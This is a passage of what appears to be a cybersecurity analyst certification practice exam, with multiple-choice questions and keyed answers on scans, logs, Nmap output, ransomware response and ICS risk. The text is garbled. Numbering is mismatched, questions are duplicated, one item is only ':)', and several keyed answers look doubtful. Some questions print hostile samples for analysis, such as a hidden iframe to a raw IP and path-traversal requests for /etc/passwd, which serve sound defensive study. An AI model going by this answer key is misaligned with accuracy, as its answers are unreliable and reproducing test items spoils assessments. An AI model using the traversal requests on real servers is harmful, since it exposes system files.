c. Deploy Group Policy Objects to domain resources.

d. Implement scripts to automate the configuration of PAM of Linux hosts.

Question 60

62. ** A vulnerability scan comes back with critical findings for a Microsoft SharePoint server.
    Vulnerable software installed: office 2007
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrectVersion\Installer\UserData\s-1-5 -18\Products\000021096F0100000100000000F01FEC\InstallProperties - keyexists The office component Microsoft Office Excel Services Web Front End Components is running an affected version - 12.0.6612.1000

Which of the following actions should be taken?

a. Remove Microsoft office from the server.
b. Document the finding as an exception.
c. Install a newer version of Microsoft Office on the server.
d. Patch Microsoft Office on the server.

Answer 60

d. Patch Microsoft Office on the server.

Question 61

63. ** A vulnerability scan report shows a vulnerable version of Apache on a Linux server. The analyst validates the version by retrieving the server’s banner. The server’s administrator verifies that all available updates have been installed, but an attempt to exploit the vulnerability fails. Which of the following MOST likely occurred?

a. The vulnerability scanner is unable to properly establish a connection to the server.
b. The scanner agent was improperly installed.
c. The Apache server was patched before the scan was completed.
d. The package manager includes backported versions of Apache.

Answer 61

d. The package manager includes backported versions of Apache.

Question 62

64. ** Which of the following organizations would have to remediate embedded controller vulnerabilities?

a. Banking institutions
b. Public universities
c. Regulatory agencies
d. Hydroelectric facilities

Answer 62

d. Hydroelectric facilities

Question 63

65. ** Which of the following is a security concern found PRIMARILY in virtual infrastructure?

a. Two-factor authentication for network resources
b. Physical hardware supporting multitenancy
c. Airgapped system that will not run on the hypervisor
d. User access to outside resources

Answer 63

b. Physical hardware supporting multitenancy

Question 64

66. ** A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?

a. System isolation
b. Honeypot
c. Jump box
d. Mandatory access control

Answer 64

c. Jump box

Question 65

67. ** Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate?

a. ICS/SCADA systems are not supported by the CVE publications.
b. ICS/SCADA system rarely have full security functionality.
c. ICS/SCADA systems do not allow remote connections.
d. ICS/SCADA systems use encrypted traffic to communicate between devices.

Answer 65

b. ICS/SCADA system rarely have full security functionality.

Question 66

67. ** Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate?

a. ICS/SCADA systems are not supported by the CVE publications.
b. ICS/SCADA system rarely have full security functionality.
c. ICS/SCADA systems do not allow remote connections.
d. ICS/SCADA systems use encrypted traffic to communicate between devices.

Answer 66

b. ICS/SCADA system rarely have full security functionality.

Question 67

67. ** Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate?

a. ICS/SCADA systems are not supported by the CVE publications.
b. ICS/SCADA system rarely have full security functionality.
c. ICS/SCADA systems do not allow remote connections.
d. ICS/SCADA systems use encrypted traffic to communicate between devices.

Answer 67

b. ICS/SCADA system rarely have full security functionality.

Question 68

69. ** In the development stage of the incident response policy, the security analyst needs to determine the stakeholders for the policy. Which of the following would be the policy stakeholders?

a. Human resources, legal, public relations, management
b. Chief Information Officer (CIO), Chief Executive Officer (CEO), the board of directors, stockholders
c. IT, human resources, security administrator, finance
d. Public information officer, human resources, audit, customer service

Answer 68

b. Chief Information Officer (CIO), Chief Executive Officer (CEO), the board of directors, stockholders

Question 69

70. ** After reviewing security logs, it is noticed that sensitive data is being transferred over an insecure network. Which of the following would a cybersecurity analyst BEST recommend that the organization implement?

a. Use a VPN.
b. Update the data classification matrix.
c. Segment the networks.
d. Use a FIM.
e. Use a digital watermark.

Answer 69

a. Use a VPN.

Question 70

71. ** The help desk informed a security a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:
    Locky.js
    xerty.ini
    xerty.lib
    Further analyst indicates that when the .zip file is opened; it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices?

a. Disable access to the company VPN
b. Move the files from the NAS to a cloud-based strong solution
c. Set permissions on file shares to read-only
d. Add the URL included in the .js file to the company’s web proxy filter

Answer 70

d. Add the URL included in the .js file to the company’s web proxy filter

Question 71

72. ** A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would appropriate to use in this case?

a. MSBA
b. SHA1sum
c. FIM
d. DLP

Answer 71

c. FIM

Question 72

74. ** As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause?

a. The vulnerability scanner should have utilized a credentialed scan.
b. The OWASP Top does not include methods to detect this class of vulnerability.
c. The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS.
d. The application is not subject to PCI, so it doesn’t need to be scanned at the network Layer.

Answer 72

b. The OWASP Top does not include methods to detect this class of vulnerability.

Question 73

75. ** An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following:
    - The source of the breach is linked to an IP located in a foreign country.
    - The breach is isolated to the research and development servers.
    - The hash values of the data before and after the breach are unchanged.
    - The affected servers were regularly patched, and a recent scan showed no vulnerabilities.
    Which of the following conclusions can be drawn with respect to the threat and impact? (Select TWO)

a. The confidentiality of the data is unaffected.
b. The threat is an APT.
c. The source IP of the threat has been spoofed.
d. The integrity of the data is unaffected.
e. The threat is an insider.

Answer 73

b. The threat is an APT.

d. The integrity of the data is unaffected.

Question 74

76. ** A security analyst is monitoring authentication exchanges over the company’s wireless network. A sample of the Wireshark output is shown below:
    No Time Source Destination Protocol Info
    1345 191.12345 Cisco_91:aa Netgear_a5:ef EAP Request, Identify
    1350 191.12456 Netgear_a5:ef Cisco_91:aa EAP Response, Identify
    1355 191.12678 Cisco_91:aa Netgear_a5:ef EAP Request, LEAP
    1360 191.12890 Netgear_a5:ef Cisco_91:aa TLSv1.1 Client Hello
    ….
    2145 193.12345 fooHost barServer TCP GET ./login.jsp
    2150 193.12456 barServer TCP TCP Source port:80
    …
    Which of the following would improve the security posture of the wireless network?

a. Using PEAP instead of LEAP
b. Using SSL 2.0 instead of TLSv1.1
c. Using .aspx instead of.jsp
d. Using UDP instead of TCP

Answer 74

a. Using PEAP instead of LEAP

Question 75

77. ** In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of “unlocking” files that belonged to the previous human resources manager. The security analyst has uncovered a tool that is used to display file-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Select TWO)

a. Unauthorized data exfiltration
b. Unauthorized data masking
c. Unauthorized access
d. Unauthorized software
e. Unauthorized controls

Answer 75

c. Unauthorized access

d. Unauthorized software

Question 76

78. ** A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid?

a. Access control policy
b. Account management policy
c. Password policy
d. Data ownership

Answer 76

c. Password policy

Question 77

79. ** Nmap done: 1 IP address ( 1host up) scanned in 0.822 seconds
    Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:34 EDT
    Interesting ports on host adminServer (192.168.1.1.15):
    PORT STATE SERVICE
    22/tcp open ssh
    139/tcp open netbios-ssn
    3306/tcp open mysql
    Service detection performed.
    Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds
    Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:35 EDT
    Interesting ports on host opsServer (192.168.1.16):
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    139/tcp open netbios-ssn
    1417/tcp open OpenSSh
    Service detection performed.
    Nmap done: 1IP address (1 host up) scanned in 0.822 seconds
    Which of the following servers is out of compliance?

a. finServer
b. adminServer
c. orgServer
d. opsServer

Answer 77

d. opsServer

Question 78

80. An analyst is conducting a log review and identifies the following snippet in one of the logs:
    Jun 10 07:09:10 databse1 sshd [24665] : Invalid user root from 101.79.130.213
    Jun 10 07:36:03 databse1 sshd [24901] : Invalid user root from 101.79.130.213
    Jun 10 07:42:44 databse1 sshd [24938] : Invalid user root from 101.79.130.213
    Jun 10 07:56:11 databse1 sshd [26570] : Invalid user root from 101.79.130.213
    Jun 10 08:02:55 databse1 sshd [30144] : Invalid user root from 101.79.130.213
    Which of the following MOST likely caused this activity?

a. SQL injection
b. Privilege escalation
c. Forgotten Password
d. Brute force

Answer 78

d. Brute force

Question 79

81. ** An organization has a practice of running some administrative services on non-standard ports as a way of frustrating any attempts at reconnaissance. The output of the latest scan on host 192.168.1.13 is shown below:
    Starting Nmap 4.67 (http://nmap.org) at 2011-11-03 18:32 EDT
    Nmap scan report for 192.168.1.13
    Host is up (0.00066s latency).
    Not shown: 990 closed ports
    PORT STATE SERVICE
    23/tcp open ssh
    111/tcp open rpcbind
    139/tcp open netbios-ssn
    1417/tcp open OpenSSH
    3306/tcp open mysql
    MAC Address : 01:AA:FB:23:21:45
    Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
    Which of the following statements is true?

a. Running SSH on the Telnet Port will now be sent across an unencrypted port.
b. Despite the result of the scan, the service running on port 23 is actually telnet and not SSH, and creates an additional vulnerability.
c. Running SSH on port 23 provides little additional security from running it on the standard port.
d. Remote SSH connections will automatically default to the standard SSH port.
e. The use of OpenSSH on its default secure port will supersede any other remote connection attempts.

Answer 79

c. Running SSH on port 23 provides little additional security from running it on the standard port.

Question 80

82.	** A cybersecurity analyst is currently checking a newly deployed server that has an access control list applied. When conducting the scan, the analyst received the following code snippet of results:
Mail Server1
Trying 192.168.2.2
Connected
Get/HTTP/1.0
HTTP: 1.0 200 Document follows
Server: server/0.10
Connection: close
Set-cookie: testing=1; path=/
Which of the following describes the output of the scan?

a. The analyst has discovered a false Positive, and the status code is incorrect providing an OK message.
b. The analyst has discovered a True Positive, and the status code is correct providing a file not found error message.
c. The analyst has discovered a True Positive, and the status code is incorrect providing a forbidden message.
d. The analyst has discovered a False Positive, and the status code is incorrect providing a server error message.

Answer 80

d. The analyst has discovered a False Positive, and the status code is incorrect providing a server error message.

Question 81

83. Employees at a manufacturing plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario?

a. Continue to monitor security devices.
b. Update antivirus and malware definitions.
c. Provide security awareness training.
d. Migrate email services to a hosted environment.

Answer 81

c. Provide security awareness training.

Question 82

84. A security analyst received an email with the following key:
    Xj3XJ3LLc
    A second security analyst received an email with the following key:
    3XJ3xjcLLC
    The security manager has informed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example:

a. dual control
b. private key encryption
c. separation of duties
d. public key encryption
e. two-factor authentication

Answer 82

e. two-factor authentication

Question 83

85. *! A cybersecurity was asked to review several results of web vulnerability scan logs.
    Given the following snippet of code:
    Iframe src=”http//65.240.22.1” width=”0” height=”0” frmeborder=”0” tabindex=”-1” title=”empty”
    style=visibility:hidden; display:none/iframe
    Which of the following BEST describes the situation and recommendations to be made?

a. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name.
b. The security analyst has discovered an embedded iframe that is hidden from the user accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
d. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

Answer 83

c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious.

Question 84

86. ** A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement the corrective control. Which of the following would be the MOST inhibiting to applying the fix?

a. Requiring a firewall reboot
b. Resetting all administrator password
c. Business process interruption
d. Full desktop backups

Answer 84

c. Business process interruption

Question 85

87. ** The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premises implementation. A critical application that is subject to the Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid cloud deployment model. Which of the following should be conducted FIRST?

a. Develop a request for proposal
b. Perform a risk assessment
c. Review current security controls
d. Review the SLA for FISMA compliance

Answer 85

b. Perform a risk assessment

Question 86

88. The development team recently moved to a new application into production for the accounting department. After this occurred, the chief information officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?

a. Security regression testing
b. User acceptance testing
c. Input validation testing
d. static code testing

Answer 86

b. User acceptance testing

Question 87

89. A human resources employee sends out a mass email to all employees that contain their personnel records. A security analyst is called in to address the concern of the human resources director on how to prevent this from happening in the future. Which of the following would be the BEST solution to recommend to the director?

a. Install a data loss prevention system, and train human resources employees on its use.
b. Provide Pll training to all employees at the company. Encrypt Pll information.
c. Enforce encryption on all emails sent within the company. Create a Pll program and policy on how to handle data Train all human resources employees.
d. Train all employees. Encrypt data sent on the company network. Bring in privacy personnel to present a plan on how Pll should be handled.
e. Install specific equipment to create a human resources policy that protects Pll data. Train company employees on how to handle Pll data. Outsource all Pll to another company. Send the human resources director to be training for Pll handling.

Answer 87

b. Provide Pll training to all employees at the company. Encrypt Pll information.

Question 88

90. ** A software engineer has resigned and given two weeks’ notice. The organization is concerned the engineer may have taken proprietary code. Which of the following will BEST help the security analysts to determine if any code has been exfiltrated?

a. Terminate and immediately escort the engineer out of the building.
b. Develop a timeline of the engineer’s system and network activity.
c. Investigate when projects were checked out of the code repository by the engineer.
d. Dump the contents of RAM from the engineer’s workstation and review.

Answer 88

b. Develop a timeline of the engineer’s system and network activity.

Question 89

91. During an investigation, an incident responder intends to recover multiple pieces of digital media. Before removing the media, the responder should initiate:

a. malware scans
b. secure communication
c. chain of custody forms
d. decryption tools

Answer 89

c. chain of custody forms

Question 90

92. ** A security analyst receives a mobile device with symptoms of a virus infection. The virus is morphing whenever it is moved from sandbox to sandbox to analyze. Which of the following will help to identify the number of variations through the analysis life cycle?

a. Journaling
b. Hashing utilities
c. Log viewers
d. OS and process analysis
e. IOC tagging

Answer 90

e. IOC tagging

Question 91

93. A company wants to replace its existing security infrastructure, including the firewall, IPS, and vulnerability scanner. A demo scanner from the new vendor is deployed. The analyst scans a device with the demo and legacy scanners and compares the results:
    Vulnerability Legacy Scanner Demo Scanner
    Chrome <44.3.1532.34 X
    Chrome <43.7.9786.72 X
    Adobe Reader < 10 X
    Microsoft SMB Remote Code
    Execution
    X X
    Apache < 2.4 X X
    Which of the following is MOST likely responsible for the discrepancy in results?

a. The demo scanner needs to be configured to run a credentialed scan.
b. The demo scanner needs to be configured as an exception in the IPS.
c. The demo scanner is cloud-based and cannot identify local vulnerabilities.
d. The legacy scanner is producing false positives and should be replaced.

Answer 91

a. The demo scanner needs to be configured to run a credentialed scan.

Question 92

94. An analyst was investigating an attack that place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE)

a. RBAC
b. LEAP
c. DAC
d. PEAP
e. MAC
f. SCAP
g. BCP

Answer 92

A. RBAC
C. DAC
E. MAC

Question 93

95. The security team for a large, international organization is developing a vulnerability management program. The development staff has expressed concern that the new program will cause service interruptions and downtime as vulnerabilities are remedied. Which of the following should the Security team implement FIRST as a component of the remediation process to address this concern?

a. Automated patch management
b. Change control procedures
c. Security regression testing
d. Isolation of vulnerable servers

Answer 93

c. Security regression testing

Question 94

96. ** A worm was detected on multiple PCs within a remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation?

a. Logical isolation of the remote office
b. Sanitization of the network environment
c. Segmentation of the network
d. Secure disposal of affected systems

Answer 94

c. Segmentation of the network

Question 95

:)

Answer 95

:)

Question 96

98. A Cybersecurity analyst is capturing an image of a machine that is possibly infected with web malware. During which of the following incident response phases does that occur?

a. Eradication
b. Analysis
c. Recovery
d. Post-incident

Answer 96

b. Analysis

Question 97

99. ** An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here:
    Starting Nmap 4.67 (http://map.org) at 2011-11-03 18:32 EDT
    Nmap scan report for 192.168.1.13
    Host is up (0.00066s latency).
    />Not shown: 992 closed ports
    PORT STATESERVICE
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    139/tcp open netbios-ssn
    3306 open mysql
    MAC Address:01:AA:FB:23:21:45
    Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
    Given the organization’s policy, which is the following services should be disabled on this server?

a. rpcbind
b. netbios-ssn
c. mysql
d. ssh
e. talent

Answer 97

d. ssh

Question 98

99. ** A threat intelligence analyst who works for an oil and gas company has received the following email from a superior.
    “We will be connecting our IT network with our ICS. Our IT security has historically been top of the line and this convergence will make the ICS easier to manage and troubleshoot. Can you please perform a risk/vulnerability assessment of this decision?”

Which of the following is MOST accurate regarding ICS in this scenario?

a. Convergence decrease attack vectors.
b. Integration increases the attack surface.
c. IT networks cannot be connected to ICS infrastructure.
d. Combined networks decrease efficiency.

Answer 98

b. Integration increases the attack surface.

Question 99

100. A security analyst found a packet analysis tool developed by the DHS that is available without registration on file-share sites. Many reputable security sites recommend the tool. However, the DHS site needs to be registered in order to get the download link with integrity verification. Which of the following describes the method the analyst would use the ensure the tool that is downloaded from the file share is an exact copy of the tool DHS is providing?

a. Hashing
b. Encryption
c. Source authentication
d. Isolation

Answer 99

a. Hashing

Question 100

101. A systems administrator is doing network reconnaissance of a company’s external network to determine the vulnerability of various services that are running. Sending some sample traffic to the external host, the administrator obtains the following packet capture:
     18 17.646496 67.53.200.1 67.53.20.12 TCP 58 47669 -> 22 [SYN] Seq=0 Win=1024 Len=0
     MSS=1460
     19 17.646944 67.53.200.1 67.53.200.12 TCP 58 47669 -> 445 [SYN] Seq=0 Win=1024
     Len=0 MSS=1460
     20 17.648631 67.53.200.12 67.53.200.1 TCP 58 22 -> 47669 [SYN, ACK] Seq=0 Ack=1
     Win=5840 Len=0 MSS=1460
     21 17.648646 67.53.200.1 67.53.200.12 TCP 58 47669 -> 80 [SYN] Seq=0 Win=1024 Len=0
     MSS=1460
     22 17.648887 67.53.200.12 67.53.200.1 TCP 54 445 -> 47669 [RST, ACK] Seq=1 Ack=1 Win=0
     Len=0
     23 17.649763 67.53.200.12 67.53.200.1 TCP 54 80 -> 47669 [RST, ACK] Seq=1 Ack Win=0
     Len=0
     Based on the output, which of the following services should be further tested for vulnerabilities?

a. SSH
b. HTTP
c. SMB
d. HTTPS

Answer 100

c. SMB

Question 101

102. ** A company is concerned about attacks in which an attacker impersonates a user by extracting password hashes. A security analyst has been tasked with mitigating this potential threat. Which of the following security controls would BEST mitigate this issue?

a. Salting the password hashes
b. Increasing bit length of the hashing algorithm
c. Multifactor authentication via smart cards
d. Policy requiring 15-character password

Answer 101

a. Salting the password hashes

Question 102

103. An analyst has informed the Chief Executive Officer (CEO) of a company that a security breach has occurred. The risk manager was unaware and caught off-guard when the CEO asked for further information. Which of the following should be implemented to ensure the risk manager is knowledgeable of any future breaches?

a. Incident management
b. Lessons learned report
c. Chain of custody management
d. Change control process

Answer 102

a. Incident management

Question 103

104. ** As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause?

a. The vulnerability scanner should have utilized a credentialed scan.
b. The OWASP Top 10 does not include methods to detect this class of vulnerability.
c. The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS.
d. The application is not subject to PCI, so it doesn’t need to be scanned at the network layer

Answer 103

b. The OWASP Top 10 does not include methods to detect this class of vulnerability.

Question 104

105. Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organization’s application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan?
     a. Newly discovered PII on a server
     b. A vendor releases a critical patch update
     c. A critical resource utilization in the organization’s application
     d. False positives identified in production

Answer 104

b. A vendor releases a critical patch update

Question 105

106. An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account has been authenticating successfully for some time and started to fail this morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.
b. The host-based firewall is blocking port 389 LDAP communication, preventing the login credentials from being received by the application server.
c. The license for the application has expired, and the failed login will continue to occur until a new license key is installed on the application.
d. A successful malware attack has provided someone access to the network, and failed login attempt to privilege access to the application.

Answer 105

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.

Question 106

107. A cybersecurity analyst is reviewing the results of a recent external vulnerability scan. Several DDoS vulnerabilities are identified for devices, including a GroupWise mail server and several wireless access points that have critical, high vulnerabilities. None of these devices are listed on the network or software inventory. Which of the following should the analyst perform NEXT?

a. Notify accounting of errors on the hardware and software inventories.
b. Check the firewall logs for suspicious activity.
c. Request a new scan with a different tool and compare the findings.
d. Block the GroupWise mail server at the firewall.

Answer 106

a. Notify accounting of errors on the hardware and software inventories.

Question 107

108. ** A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process to a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Select TWO).

a. Breach of confidentiality and market risk can occur if the potential acquisition is leaked to the press.
b. The parent company is only going through this process to identify and steal the intellectual property of the smaller company.
c. The company being acquired has its own tools and process and will be resistant to integrating with the parent company.
d. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.
e. The industry may decide that the acquisition will result in unfair competitive advantage if the acquisition were to take place.
f. The company being acquired may already be compromised, and this could pose a risk to the parent company’s assets.

Answer 107

a. Breach of confidentiality and market risk can occur if the potential acquisition is leaked to the press.
f. The company being acquired may already be compromised, and this could pose a risk to the parent company’s assets.

Question 108

109. ** After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment?

a. Cross training
b. Succession planning
c. Automated reporting
d. Separation of duties

Answer 108

d. Separation of duties

Question 109

110. A staff member reported that a laptop has degraded performance. The security analyst has investigated the issue and discovered that CPU utilization, memory utilization, and outbound network traffic are consuming the laptop’s resources. Which of the following is the BEST course of action to resolve the problem?

a. Identify and remove malicious processes.
b. Disable scheduled tasks.
c. Suspend virus scan.
d. Increase laptop memory.
e. Ensure the laptop OS is properly patched.

Answer 109

a. Identify and remove malicious processes.

Question 110

111. Which of the following system or services is MOST likely to exhibit issues stemming from the Heartbleed vulnerability? (Select TWO).

a. SSH daemons
b. Web servers
c. Modbus devices
d. TLS VPN services
e. IPSec VPN concentrators

Answer 110

b. Web servers

d. TLS VPN services

Question 111

112. Which of the following organizations would have to remediate immediately embedded controller vulnerabilities?

a. Banking institutions
b. Public universities
c. Regulatory agencies
d. Hydroelectric facilities

Answer 111

d. Hydroelectric facilities

Question 112

113. A security analyst is conducting traffic analysis following a potential web server breach. The analyst wants to investigate client-side server errors.
     Time IP Protocol Status Code
     11:42 10.34.3.5 HTTP 500
     11:39 85.13.7.6 HTTP 200
     11:15 72.33.8.2 HTTP 401
     11:01 33.88.9.6 HTTP 102
     Which of the following lines of this query output should be investigated?

a. 1
b. 2
c. 3
d. 4

Answer 112

a. 1

Question 113

114. Ransomware is identified on a company’s network that affects both Windows and MAC hosts. The command and control channel for encryption for this uses TCP ports from 11000 to 65000. The channel goes1. Lholdbadkeys.com, which resolves to IP address 172.172.16.2. Which of the following is the MOST effective way to prevent any newly infected system from actually encrypting the data on connected-network drives while Causing the least disruption to normal internet traffic?

a. Block all outbound traffic to web host good1 iholdbadkeys.com at the border gateway.
b. Block all outbound TCP connections to IP host address 172.172.16.2 at the border gateway.
c. Block all outbound traffic on TCP ports 11000 to 65000 at the border gateway.
d. Block all outbound traffic on TCP ports 11000 to 65000 to IP host address 172.172.15.2 at the border gateway.

Answer 113

a. Block all outbound traffic to web host good1 iholdbadkeys.com at the border gateway.

Question 114

115. ** A security analyst has concluded that suspicious intermittent network activity is coming from one or more systems using random IP addresses and MAC addresses. The same IP or MAC address is not used twice. Which of the following is the BEST course of action to Identify the source of the suspicious activity when it resumes?

a. Configure a dynamic sinkhole
b. Review the firewall logs
c. Trace down to the switchport
d. Review the network IDS logs

Answer 114

c. Trace down to the switchport

Question 115

116. ** After reading about data breaches at a competing company. Senior leaders in an organization have grown increasingly concerned about social engineering attacks. They want to increase awareness among staff regarding this threat but do not want to use traditional training methods because they regard these methods as ineffective. Leadership wants to focus particular attention on potential attackers ‘use of reconnaissance techniques and information gathering attempts. Which of the following approaches would BEST meet the requirements?

a. Classroom training on the dangers of social media followed by a test and gift certificates for any employee getting a perfect score
b. Simulated phishing emails asking employees to reply to the email with their updated phone number and office location
c. A poster contest to raise awareness of Pll and asking employees to provide examples of data breaches and consequences
d. USB drives randomly placed inside an organization that contains a pop-up warning to any users who plug the drive into their computer

Answer 115

b. Simulated phishing emails asking employees to reply to the email with their updated phone number and office location

Question 116

117. A security wants to confirm a finding from a penetration test reports on the internal webserver. To do so, the analyst logs into the webserver using SSH to send the request locally. The report provides a link to https://hrserver.internal/1/etc/passwd, and the server IP address is 10.10.10.15. However, after several attempts, the analyst cannot get the file, despite attempting to get it using different ways, as shown below.
     Request Response
     https://hrserver.internal/../../etc/ password Host not found
     https://localhost/../../etc/ password file not found
     https://10.10.10.15/../../etc/ password file not found
     Which of the following would explain this problem? (Select TWO)

a. The web server uses SNI to check for a domain name
b. Requests can only be sent remotely to the webserver
c. There is no local name resolution for hrserver.internal
d. The password file is write protected
e. The web service has not started

Answer 116

a. The web server uses SNI to check for a domain name

b. Requests can only be sent remotely to the web server

Question 117

118. ** Management has directed the IT department to reduce operating costs by implementing the virtualization of the server infrastructure. Shortly after the implementation of a new virtual web server, the hypervisor is compromised. Which of the following is the most likely cause of the compromised hypervisor?

a. The web server was virtualized using the incorrect storage pool.
b. The web server was not placed properly in the DMZ virtual network
c. The attacker was able to escape the VM server to the host shell
d. VM infrastructure allows direct access to the VM host unless a VM firewall is configured

Answer 117

c. The attacker was able to escape the VM server to the host shell

Question 118

119. ** Ransomware is identified on a company’s network that affects both Windows and MAC hosts. The command and control channel for encryption for this variant uses TCP ports from 11000 to 65000. The channel goes to good1 Iholdbadkeys.com which resolves to IP address 172.172.16.2 Which of the following is the most effective way to prevent any newly infected systems from actually encrypting the data on connected network drives while causing the least disruption to normal Internet traffic?

a. Block all outbound traffic to web host good1 .iholdbadkeys.com at the border gateway
b. Block all outbound TCP connections to ip host address 172.172..16.2 at the border gateway.
c. Block all outbound traffic on TCP ports 11000 to 65000 at the border gateway
d. Block all outbound traffic on TCP ports 11000 to 65000 to IP host address 172.172.16.2 at the border gateway

Answer 118

a. Block all outbound traffic to web host good1 .iholdbadkeys.com at the border gateway

Question 119

120. The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the followings files:
     Locky.js
     xerty.ini
     Xerty.lib
     Further analysis indicates that when the .zip file is opened; it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices?

a. Disable access to the company VPN
b. Move the file from the NAS to a cloud-based storage solution.
c. Set permissions on file shares to read-only
d. Add the URL included in the .js file to the company’s web proxy filter

Answer 119

d. Add the URL included in the .js file to the company’s web proxy filter

Question 120

121. A small company is publishing a new job application to receive customer feedback related to its products. The web server will only host a form to receive the customer feedback and store it in a local database. The web server is placed in a Dmz network, and the web service and file system have been hardened. However, the cybersecurity analyst discovers that data from the database can be mined from over the internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

a. Configure the database to listen for incoming connections on the internal network
b. Change the database connection string and apply necessary patches
c. Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443
d. Deploy a web application firewall to protect the web application from attacks to the database

Answer 120

c. Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443

Question 121

** 122. During which of the following NIST risk management framework steps would an information systems engineer identify security controls and tailor those controls to the system?

a. Categorize
b. Select
c. Implement
d. Assess

Answer 121

b. Select

Question 122

123. ! A security has been asked to scan a subnet During the scan, the following output was generated:
     {root@scanbox-}# nmap 192.168.100.
     Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2015-10-10 19:10 EST
     Interesting ports onpurple.company.net (192.168.100.214):
     Not shown: 1676 closed ports
     PORT STATE SERVICE
     22/tcp open ssh
     80/tcp open http
     111/tcp open rpcbind
     443/tcp open ssl/http
     Nmap finished: 256 IP addresses (2 hosts up) scanned in 7.223 seconds
     Based on the output above, which of the following is most likely?

a. 192.168. 100.214 is a secure FTP server
b. 192.168. 100.214 is a web server
c. Both hosts are mail servers
d. 192.168. 100.145 is a DNS server

Answer 122

b. 192.168. 100.214 is a web server

Question 123

124. ** A penetration test for the internal DNS service of a company is scheduled, and the security analyst uses the tcpdump udp port 53 -i eth0 command to get a packet capture from the DNS server that will be used to confirm any findings. During the daily report meeting, the penetrator Tester reports a zone transfer vulnerability using dig - axfr command against the server. The analyst opens the packet capture from the day before but there are no traces of the transfer. Which of the following is the MOST likely cause of this issue?

a. A false positive was reported by the penetration tester
b. The packet analyzer software does not support DNS protocol parsing
c. The zone transfer used a different protocol
d. The zone transfer happened before the packet capture started
e. The DNS zone transfers used a different port and were filtered out of the capture
f. Tcpdump does not support capturing DNS packets

Answer 123

e. The DNS zone transfers used a different port and were filtered out of the capture

Question 124

